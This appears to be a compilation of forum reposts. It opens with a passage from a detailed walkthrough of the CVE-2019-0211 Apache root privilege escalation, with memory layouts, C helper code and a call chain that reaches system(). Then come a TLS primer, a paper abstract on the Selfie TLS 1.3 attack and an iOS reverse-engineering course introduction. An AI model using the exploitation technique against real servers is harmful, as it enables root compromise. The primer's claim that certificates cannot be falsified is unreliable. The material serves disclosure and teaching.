Since we're triggering the UAF on a PHP object, any property of this object will be UAF'd too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string's structure:

(gdb) ptype zend_string
type = struct _zend_string {
  zend_refcounted_h gc;
  zend_ulong h;
  size_t len;
  char val[1];
}

The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we're interested in: the SHM and Apache's all_buckets.

Locating bucket indexes and all_buckets

We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate.

Shared memory location and targeted process_score structures

root@apaubuntu:~# cat /proc/6318/maps | grep rw-s
7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052 /dev/zero (deleted)

(gdb) p &ap_scoreboard_image->parent[0]
$18 = (process_score *) 0x7f4a9323e020
(gdb) p &ap_scoreboard_image->parent[1]
$19 = (process_score *) 0x7f4a9323e044

To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have:

Important structures of bucket items

prefork_child_bucket {
  ap_pod_t *pod;
  ap_listen_rec *listeners;
  apr_proc_mutex_t *mutex;  <--
}

apr_proc_mutex_t {
  apr_pool_t *pool;
  const apr_proc_mutex_unix_lock_methods_t *meth;  <--
  int curr_locked;
  char *fname;
  ...
}

apr_proc_mutex_unix_lock_methods_t {
  unsigned int flags;
  apr_status_t (*create)(apr_proc_mutex_t *, const char *);
  apr_status_t (*acquire)(apr_proc_mutex_t *);
  apr_status_t (*tryacquire)(apr_proc_mutex_t *);
  apr_status_t (*release)(apr_proc_mutex_t *);
  apr_status_t (*cleanup)(void *);
  apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *);  <--
  apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t);
  apr_lockmech_e mech;
  const char *name;
}

all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr's .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr's .text.

Since we know those regions' addresses through /proc/self/maps, we can go through every pointer in Apache's memory and find one that matches the structure. It will be all_buckets[0]. As I mentioned, all_buckets' address changes at every graceful restart. This means that when our exploit triggers, all_buckets' address will be different from the one we found. This has to be taken into account; we'll talk about this later.
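Here is a hedged C sketch of that matching logic. In the real exploit the reads go through the corrupted zend_string rather than raw pointer dereferences, and the region bounds come from /proc/PID/maps; the demo main() fabricates the pointer chain so the matcher has something to find. All names and offsets are mine, assuming a 64-bit layout:

#include <stdint.h>
#include <stdio.h>

typedef struct { uintptr_t lo, hi; } region;
static int in(region r, uintptr_t p) { return p >= r.lo && p < r.hi; }

/* Scan a readable window for a pointer chain shaped like
 * prefork_child_bucket -> apr_proc_mutex_t (meth in .data)
 * -> child_init in .text. */
static uintptr_t find_all_buckets(const uint8_t *base, size_t len,
                                  region heap, region data, region text)
{
    for (size_t off = 0; off + 3 * sizeof(uintptr_t) <= len; off += sizeof(uintptr_t)) {
        const uintptr_t *cand = (const uintptr_t *)(base + off);
        if (!in(heap, cand[2])) continue;                 /* ->mutex      */
        const uintptr_t *mtx = (const uintptr_t *) cand[2];
        if (!in(data, mtx[1])) continue;                  /* ->meth       */
        if (in(text, ((const uintptr_t *) mtx[1])[6]))    /* ->child_init */
            return (uintptr_t) cand;                      /* all_buckets? */
    }
    return 0;
}

int main(void)
{
    /* fabricate the chain inside one buffer to demo the matcher */
    static uintptr_t buf[32];
    uintptr_t *meth = &buf[16], *mtx = &buf[8], *bkt = &buf[0];
    meth[6] = (uintptr_t) &buf[30];        /* stand-in ".text" pointer */
    mtx[1]  = (uintptr_t) meth;
    bkt[2]  = (uintptr_t) mtx;

    region whole = { (uintptr_t) buf, (uintptr_t)(buf + 32) };
    region text  = { (uintptr_t) &buf[30], (uintptr_t) &buf[31] };
    printf("candidate at %p (expected %p)\n",
           (void *) find_all_buckets((const uint8_t *) buf, sizeof buf,
                                     whole, whole, text),
           (void *) buf);
    return 0;
}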
2. Write a fake prefork_child_bucket structure in the SHM

Reaching the function call

The code path to the arbitrary function call is the following:

bucket_id = ap_scoreboard_image->parent[id]->bucket
my_bucket = all_buckets[bucket_id]
mutex = &my_bucket->mutex
apr_proc_mutex_child_init(mutex)
(*mutex)->meth->child_init(mutex, pool, fname)

Calling something proper

To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain:

mutex = &my_bucket->mutex
[object = mutex]
zend_object_std_dtor(object)
    ht = object->properties
    zend_array_destroy(ht)
    zend_hash_destroy(ht)
    val = &ht->arData[0]->val
    ht->pDestructor(val)

pDestructor is set to system, and &ht->arData[0]->val is a string. As you can see, both leftmost structures are superimposed.

3. Make all_buckets[bucket] point to the structure

Problem and solution

Right now, if all_buckets' address were unchanged between restarts, our exploit would be over:

- Get R/W over all memory after PHP's heap
- Find all_buckets by matching its structure
- Put our structure in the SHM
- Change one of the process_score.bucket values in the SHM so that all_buckets[bucket]->mutex points to our payload

Since all_buckets' address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure, one for each PID.

Spraying the shared memory

If all_buckets' new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of putting our prefork_child_bucket structure at one precise spot in the SHM, we can spray it all over the unused parts of the SHM. The problem is that the structure is also used as a zend_object, and therefore it has a size of 5 * 8 = 40 bytes to include zend_object.properties. Spraying a structure that big over a space this small won't help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address over the rest of the shared memory. The effect is that prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_buckets is relocated not too far from its original address, my_bucket will land in the sprayed area.

Using every process_score

Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change all of them, so that each covers a different part of memory (see the index-calculation sketch below). For instance:

ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00
ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00
ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000

This multiplies our success rate by the number of Apache workers. Upon respawn, only one worker has a valid bucket number, but this is not a problem, because the others will crash and immediately respawn.

Success rate

Different Apache servers have different numbers of workers. Having more workers means we can spray the address of our mutex over less memory, but it also means we can specify more indexes for all_buckets. In other words, having more workers improves our success rate. After a few tries on my test Apache server with 4 workers (the default), I had an ~80% success rate. The success rate jumps to ~100% with more workers.
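A small sketch of how such per-worker indexes can be derived. Everything here is an assumption flagged as such: the 24-byte bucket size (three pointers on x86-64), the window stride, and the addresses (taken from this writeup's debug output) are illustrative, not universal constants:

#include <stdio.h>
#include <stdint.h>

#define BUCKET_SIZE 24   /* assumed sizeof(prefork_child_bucket) on x86-64 */

int main(void)
{
    /* read from /proc/self/maps before the restart (illustrative values) */
    uintptr_t all_buckets_old = 0x7f4a9336b3f0;
    uintptr_t spray_base      = 0x7f4a9323e800;  /* sprayed payload in SHM */
    int workers = 4;

    /* one bucket index per worker, each aimed at a different guess for
     * where all_buckets[bucket] may land after the reallocation */
    for (int w = 0; w < workers; w++) {
        uintptr_t target = spray_base + (uintptr_t) w * 0x1000;
        long idx = ((long) target - (long) all_buckets_old) / BUCKET_SIZE;
        printf("ap_scoreboard_image->parent[%d]->bucket = %ld\n", w, idx);
    }
    return 0;
}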
Again, if the exploit fails, it can be restarted the next day, as Apache will still restart properly. Apache's error.log will nevertheless contain notifications about its workers segfaulting.

4. Await 6:25AM for the exploit to trigger

Well, that's the easy step.

Vulnerability timeline

2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC
2019-02-25 Acknowledgment of the vulnerability, working on a fix
2019-03-07 Apache's security team sends a patch for me to review, CVE assigned
2019-03-10 I approve the patch
2019-04-01 Apache HTTP version 2.4.39 released

Apache's team has been prompt to respond and patch, and nice as hell. A really good experience. PHP never answered regarding the UAF.

Questions

Why the name?
CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation
DIEM: the exploit triggers once a day
I had to.

Can the exploit be improved?
Yes. For instance, my computations for the bucket indexes are shaky. This is between a POC and a proper exploit. BTW, I added tons of comments; it is meant to be educational as well.

Does this vulnerability target PHP?
No. It targets the Apache HTTP server.

Exploit

The exploit will be disclosed at a later date.

Sursa: https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
21. TLS Security 1: What Is SSL/TLS

Posted on April 3, 2019 by Agathoklis Prodromou

Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are cryptographic security protocols. They are used to make sure that network communication is secure. Their main goals are to provide data integrity and communication privacy. The SSL protocol was the first protocol designed for this purpose and TLS is its successor. SSL is now considered obsolete and insecure (even its latest version), so modern browsers such as Chrome or Firefox use TLS instead.

SSL and TLS are commonly used by web browsers to protect connections between web applications and web servers. Many other TCP-based protocols use TLS/SSL as well, including email (SMTP/POP3), instant messaging (XMPP), FTP, VoIP, VPN, and others. Typically, when a service uses a secure connection, the letter S is appended to the protocol name, for example, HTTPS, SMTPS, FTPS, SIPS. In most cases, SSL/TLS implementations are based on the OpenSSL library.

SSL and TLS are frameworks that use a lot of different cryptographic algorithms, for example, RSA and various Diffie–Hellman algorithms. The parties agree on which algorithm to use during initial communication. The latest TLS version (TLS 1.3) is specified in the IETF (Internet Engineering Task Force) document RFC 8446 and the latest SSL version (SSL 3.0) is specified in the IETF document RFC 6101.

Privacy & Integrity

SSL/TLS protocols allow the connection between two parties (client and server) to be encrypted. Encryption lets you make sure that no third party is able to read the data or tamper with it. Unencrypted communication can expose sensitive data such as user names, passwords, credit card numbers, and more. If we use an unencrypted connection and a third party intercepts our connection with the server, they can see all information exchanged in plain text. For example, if we access the website administration panel without SSL, and an attacker is sniffing local network traffic, they see the following information.

The cookie that we use to authenticate on our website is sent in plain text, and anyone who intercepts the connection can see it. The attacker can use this information to log into our website administration panel. From then on, the attacker's options expand dramatically. However, if we access our website using SSL/TLS, the attacker who is sniffing traffic sees something quite different. In this case, the information is useless to the attacker.

Identification

SSL/TLS protocols use public-key cryptography. Besides encryption, this technology is also used to authenticate the communicating parties. This means that one or both parties know exactly who they are communicating with. This is crucial for applications such as online transactions, because we must be sure that we are transferring money to the person or company who are who they claim to be. When a secure connection is established, the server sends its SSL/TLS certificate to the client. The certificate is then checked by the client against a trusted Certificate Authority, validating the server's identity. Such a certificate cannot be falsified, so the client may be one hundred percent sure that they are communicating with the right server.
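As an aside, this identification step is visible in code. With OpenSSL (which most of the implementations mentioned above build on), a client must explicitly request certificate verification against a trusted CA store. A minimal, hedged sketch (the hostname is illustrative and error handling is trimmed):

#include <openssl/ssl.h>
#include <openssl/bio.h>
#include <stdio.h>

int main(void)
{
    SSL_CTX *ctx = SSL_CTX_new(TLS_client_method());
    SSL_CTX_set_default_verify_paths(ctx);        /* system CA store   */
    SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);

    BIO *bio = BIO_new_ssl_connect(ctx);
    BIO_set_conn_hostname(bio, "example.com:443");

    SSL *ssl = NULL;
    BIO_get_ssl(bio, &ssl);
    SSL_set_tlsext_host_name(ssl, "example.com"); /* SNI               */
    SSL_set1_host(ssl, "example.com");            /* hostname check,
                                                     OpenSSL >= 1.1.0  */

    if (BIO_do_connect(bio) <= 0) {               /* TCP + handshake   */
        fprintf(stderr, "connection or handshake failed\n");
        return 1;
    }
    printf("verify result: %ld (0 means X509_V_OK)\n",
           SSL_get_verify_result(ssl));

    BIO_free_all(bio);
    SSL_CTX_free(ctx);
    return 0;
}

If SSL_get_verify_result() returns anything other than X509_V_OK, the peer has not proven its identity and the connection should not be trusted.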
Perfect Forward Secrecy

Perfect forward secrecy (PFS) is a mechanism that is used to protect the client if the private key of the server is compromised. Thanks to PFS, the attacker is not able to decrypt any previous TLS communications. To ensure perfect forward secrecy, we use new keys for every session. These keys are valid only as long as the session is active.

TLS Security 2: Learn about the history of SSL/TLS and protocol versions: SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, and TLS 1.2.
TLS Security 3: Learn about SSL/TLS terminology and basics, for example, encryption algorithms, cipher suites, message authentication, and more.
TLS Security 4: Learn about SSL/TLS certificates, certificate authorities, and how to generate certificates.
TLS Security 5: Learn how a TLS connection is established, including key exchange, TLS handshakes, and more.
TLS Security 6: Learn about TLS vulnerabilities and attacks such as POODLE, BEAST, CRIME, BREACH, and Heartbleed.

Agathoklis Prodromou
Web Systems Administrator/Developer
Akis has worked in the IT sphere for more than 13 years, developing his skills from a defensive perspective as a system administrator and web developer, but also from an offensive perspective as a penetration tester. He holds various professional certifications related to ethical hacking, digital forensics and incident response.

Sursa: https://www.acunetix.com/blog/articles/tls-security-what-is-tls-ssl-part-1/
22. Selfie: reflections on TLS 1.3 with PSK

Nir Drucker and Shay Gueron
University of Haifa, Israel, and Amazon, Seattle, USA

Abstract. TLS 1.3 allows two parties to establish a shared session key from an out-of-band agreed Pre Shared Key (PSK). The PSK is used to mutually authenticate the parties, under the assumption that it is not shared with others. This allows the parties to skip the certificate verification steps, saving bandwidth, communication rounds, and latency. We identify a security vulnerability in this TLS 1.3 path, by showing a new reflection attack that we call "Selfie". The Selfie attack breaks the mutual authentication. It leverages the fact that TLS does not mandate explicit authentication of the server and the client in every message. The paper explains the root cause of this TLS 1.3 vulnerability, demonstrates the Selfie attack on the TLS implementation of OpenSSL and proposes appropriate mitigation. The attack is surprising because it breaks some assumptions and uncovers an interesting gap in the existing TLS security proofs. We explain the gap in the model assumptions and subsequently in the security proofs. We also provide an enhanced Multi-Stage Key Exchange (MSKE) model that captures the additional required assumptions of TLS 1.3 in its current state. The resulting security claims in the case of external PSKs are accordingly different.

Sursa: https://eprint.iacr.org/2019/347.pdf
23. Reverse Engineering iOS Applications

Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest in application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂

All the vulnerabilities that I'll show you here are real; they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is that most companies prohibit the publication of such content. We've helped these companies by reporting these issues to them, and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team gets to learn from those experiences. This is part of the reason I decided to create this course, built around a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers.

Even though there are already some projects[^1] aimed at teaching you common issues in iOS applications, I felt we needed one that showed the kinds of vulnerabilities we've seen in applications downloaded from the App Store.

This course is divided into 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success.

This is my first attempt at creating an online course, so bear with me if it's not the best. I love feedback, and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts, please be kind and tell me so that I can fix them and we all get to learn!

Modules

- Prerequisites
- Introduction
- Module 1 - Environment Setup
- Module 2 - Decrypting iOS Applications
- Module 3 - Static Analysis
- Module 4 - Dynamic Analysis and Hacking
- Module 5 - Binary Patching
- Final Thoughts
- Resources

License

Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com>

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Disclaimer

I created this course on my own and it doesn't reflect the views of my employer; all the comments and opinions are my own.

Disclaimer of Damages

Use of this course or material is, at all times, "at your own risk."
If you are dissatisfied with any aspect of the course, any of these terms and conditions, or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers be liable to any user or third party for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk"; I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. This limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages.

Privacy

I'm not personally collecting any information. Since this entire course is hosted on GitHub, that's the privacy policy you want to read.

[^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser: you get to understand the static code (HTML/JavaScript) of the website, but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company that created the application or its end users.

Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps